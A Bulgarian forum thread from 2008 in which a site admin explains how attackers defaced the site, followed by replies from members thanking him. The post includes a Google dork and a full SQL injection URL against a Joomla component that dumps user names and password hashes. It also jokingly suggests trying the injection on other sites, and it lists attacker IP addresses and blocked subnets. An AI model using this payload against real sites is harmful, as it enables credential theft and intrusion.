www.zachatie.org

За сайта => Правила, условия за поверителност и ползване, въпроси, предложения и техническа помощ => Темата е започната от: beast в Юни 30, 2008, 01:49:27 am

Титла: 29.06.2008 - ден без постинги
Публикувано от: beast в Юни 30, 2008, 01:49:27 am
Здравейте,
датата 29.06.2008 ще се запомни в Зачатие като деня в който има невероятно малко постинги:
0 Нови теми
9 Нови поста   
1 Нов потребител   
1868 Отворени странници в сайта

На фона на тази статистика днес сървъра ни беше повече от претоварен.
Първопричината е че най вероятно на 28-ми или на 29-ти рано сутринта е открит пробив в един от компонентите които ние ползваме на сайта и 10 хакера - 8 от Турция (комшийчета), един от Африка и един от Перу едновременно са решили да видят на кой могат да навредят.
Ето как става това:
1. В Гугъл се пуска заявка:
 http://www.google.com/search?hl=tr&lr=&rls=com.microsoft:en-US&q=inurl:com_beamospetition&start=60&sa=N
 където нашия сайт излиза на първа страница - страхотно, но и опасно.

2. На сайта който ползва този компонент се отваря адреса:
 http://www.zachatie.org/index.php?option=com_beamospetition&pet=-5%20UNION%20SELECT%20user(),user(),user(),user(),user(),user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user()%20FROM%20jos_users--

който връща резултат списък в сички потребители от таблицата jos_users заедно с хеша на паролите им - точно както са записани в таблицата. Този адрес вече не работи, понеже счупения компонент е премахнат, но може да експериментирате с други сайтове  :wink:.

3. Така изброените пароли се кракват локално с bruteforce (груба сила) и резултата е че за броени минути по лесните пароли са намерени. Нашия отличнник е турчето от адрес: 88.246.206.88 и се е справил за около минутка с администраторската парола (тук има и наша грешка - паролата беше къса и съставена само от букви).

4. След което човека се логва и вилнее на воля.

За да е по-драматична картинката нашия приятел от африка (очевидно най съобразителен) с адреси: 196.206.141.133 и 196.206.147.21 (по известен като PR0H4CK3RZ) се усеща че ползваме брич компонент с форума и решава да се разпише и там.

Тази последователност е извършена от 9 от 10-те човека без никаква допълнителна координация - това се забелязва по логовете, защото всички са тръгнали от Гугъл. Но нашия африкански приятел е подочул директно адреса от някъде, защото е влезнал директно със запитването от точка 2. Това ме навежда на мисълта че или е някои от 8-те турчета който се е усетил и е превключил на прокси, или този адрес е бил публикуван директно в някой хакерски форум (младежа с адрес:88.252.18.245 е дошъл при нас директно от хакерския портал "http://www.cyberfatal.com/" - моля, не го посещавайте защото рискувате да се заразите с вируси).

Ето и равносметката:
 - 10 хаквания на сайта през един и същи вход (началото на това изречение е много лоша новина, но това последното е много добра новина)
 - 2 пъти сайта беше възстановяван от админите в ICN (много им благодаря за съдействието и търпението)
 - Голяма част от Турция вече не вижда сайта ни (всички подмрежи на Тюрк Телеком от които е имало атаки са с централно спрян достъп до всички сървъри на ICN)
 - Всички админи и модератори вече са с нови пароли.

Адресите от които бяхме атакувани са:
88.245.5.158   TurkTelekom http://www.db.ripe.net/whois?searchtext=88.245.5.158
78.165.117.142   TurkTelekom http://www.db.ripe.net/whois?searchtext=78.165.117.142
78.161.80.235   TurkTelekom http://www.db.ripe.net/whois?searchtext=78.161.80.235
78.172.104.140   TurkTelekom http://www.db.ripe.net/whois?searchtext=78.172.104.140
88.224.67.166   TurkTelekom http://www.db.ripe.net/whois?searchtext=88.224.67.166
88.246.206.88   TurkTelekom http://www.db.ripe.net/whois?searchtext=88.246.206.88
85.98.21.109   TurkTelekom http://www.db.ripe.net/whois?searchtext=85.98.21.109
125.164.213.29 s4va+was+here   http://wq.apnic.net/apnic-bin/whois.pl?searchtext=125.164.213.29
196.206.147.21 PR0H4CK3RZ   http://www.db.ripe.net/whois?searchtext=196.206.147.21   
196.206.141.133 PR0H4CK3RZ   http://www.db.ripe.net/whois?searchtext=196.206.141.133   
88.252.18.245   TurkTelekom http://www.db.ripe.net/whois?searchtext=88.252.18.245   
190.40.50.92   TELEFONICA DEL PERU http://lacnic.net/cgi-bin/lacnic/whois?query=190.40.50.92

Подмрежите които са централно спрени са:
88.245.0.0 - 88.245.255.255
78.165.0.0 - 78.165.127.255
78.161.0.0 - 78.161.132.255
78.172.0.0 - 78.172.163.255
88.224.0.0 - 88.224.255.255
88.246.192.0 - 88.246.255.255
88.252.0.0 - 88.252.127.255
190.40.50.0/25

Поздрави и дано за в бъдеще имаме по-малко подобни изживявания.

И за последно - нека всеки който не иска да му влизат във профила да си смени паролата. По дефиниция акаунтите на обикновенните потребители не са интересни за хакерите, ама очевидно си имахме работа с аматьори този път, така че аз препоръчвам смяна на паролите :-).

Поздрави
Титла: Re: 29.06.2008 - ден без постинги
Публикувано от: mini в Юни 30, 2008, 08:26:17 am
Благодарим за добре свършената работа
Добри  :bighug:
Титла: Re: 29.06.2008 - ден без постинги
Публикувано от: Tamara в Юни 30, 2008, 09:55:07 am
Поздравления за добре свършената работа!


Вчера излизаше страница, че сайтът е хакнат от PR0H4CK3RZ.
196.206.0.0 - 196.206.255.255   AFRINIC-NET-TRANSFERRED-20050223
е африканска мрежа. Толкова много потребители от Африка ли посещават форума, че точно на тази мрежа й се размина централното спиране?
Титла: Re: 29.06.2008 - ден без постинги
Публикувано от: beast в Юни 30, 2008, 10:15:12 am
Поздравления за добре свършената работа!


Вчера излизаше страница, че сайтът е хакнат от PR0H4CK3RZ.
196.206.0.0 - 196.206.255.255   AFRINIC-NET-TRANSFERRED-20050223
е африканска мрежа. Толкова много потребители от Африка ли посещават форума, че точно на тази мрежа й се размина централното спиране?
Точно обратното.
Решихме да не го спираме централно, защото както писах поведението на хакера от там е като на човек който вече е хакнал сайта от едно място и сега просто иска да се позабавлява като влезе директно ползвайки някой заразен компютър, и така да си напише прозвището.

Което ме навежда на мисълта че този човек е със статичен адрес - някой от изброените и след като е взел паролите се е усетил че може да бъде разкрит и се е опитал да насочи вниманието ни към по голям разрушител от адрес в африканската зона.

Поздрави
Титла: Re: 29.06.2008 - ден без постинги
Публикувано от: новалекса в Юни 30, 2008, 13:02:22 pm
Честно казано, вчера влязох привечер и направо изтръпнах, като ми се оплези черепа насреща. :x
Браво за бързата реакция и добре свършената работа. Отивам да си сменя паролата :wink:
Титла: Re: 29.06.2008 - ден без постинги
Публикувано от: ultra в Юни 30, 2008, 14:40:40 pm
Браво, Добри!
Чета те, гледам колко добре си се справил с проблема и ми е кеф, че те познавам :beerdr:
Титла: Re: 29.06.2008 - ден без постинги
Публикувано от: Виктория в Юни 30, 2008, 15:08:37 pm
Браво за добре свършената работа снощи направо се зачудих какво става появи се един череп някви буквички цифрички........ужасно е но все пак важното е че всичко е наред благодарение на   beast ! :D Поздравления
Титла: Re: 29.06.2008 - ден без постинги
Публикувано от: Пепка в Юни 30, 2008, 15:39:53 pm
Браво, Добри!
Перфектно свършена работа!

 :balk_47: :balk_47: :balk_47:
Титла: Re: 29.06.2008 - ден без постинги
Публикувано от: DivaRoza в Юни 30, 2008, 17:14:26 pm
Браво, наистина за бързата реакция! Но не се учудвам, че се навъртат подобни пакостници...В сайта влизат много хора, популярен е, та такива бели са май очаквани. И аз го видях това нещо късно снощи и първото, което си помислих беше за вируси?!  :D Щото напоследък все с вируси се боря, май. Възможно ли е да пращат и вируси по този начин, или целта е само да се блокира влизането в сайта?!
Титла: Re: 29.06.2008 - ден без постинги
Публикувано от: ognyana в Юни 30, 2008, 17:27:44 pm
Тъкмо започнах да се чудя къде са ми всичките постинги от вчера... Гадост!

Браво за бързата реакция и че сте се справили с проблема!
Титла: Re: 29.06.2008 - ден без постинги
Публикувано от: Tarja в Юни 30, 2008, 19:51:00 pm
Поздравления за бързата реакция Добри!
На ниво както винаги :D
Титла: Re: 29.06.2008 - ден без постинги
Публикувано от: cygnus в Юни 30, 2008, 20:37:36 pm
Добри  :balk_5:
Титла: Re: 29.06.2008 - ден без постинги
Публикувано от: Kremkaramel в Юни 30, 2008, 21:40:02 pm
Снощи съм изпуснала да видя 4ерепа,но затова пък онзи ден за няколко минути имаше порно в първата тема "Профилактика и грижи за репр. здраве" 8O
Ина4е браво за бързата реакция и добре свършена работа!!!
Титла: Re: 29.06.2008 - ден без постинги
Публикувано от: mini в Юни 30, 2008, 21:43:51 pm
това с порното се стараем редовно да го чистим, имало е случаи по 20 теми и нагоре такива на ден да се чистят
Титла: Re: 29.06.2008 - ден без постинги
Публикувано от: deep в Юли 01, 2008, 01:31:49 am
Браво на Beast и целия екип, който се справи страхотно с това нешествие!


(http://dl10.glitter-graphics.net/pub/904/904120lkxocqky6i.gif) (http://www.glitter-graphics.com)
Титла: Re: 29.06.2008 - ден без постинги
Публикувано от: Pesheck в Юли 01, 2008, 10:11:47 am
Поздравления на Beast и на всички които не са спали (сигурно) но реагираха бързо, адекватно и навреме!
Титла: Re: 29.06.2008 - ден без постинги
Публикувано от: Black_rose в Юли 01, 2008, 11:40:31 am
Дано сайта остане само с тази дата и да няма други !
Поздравления за добре свършената работа !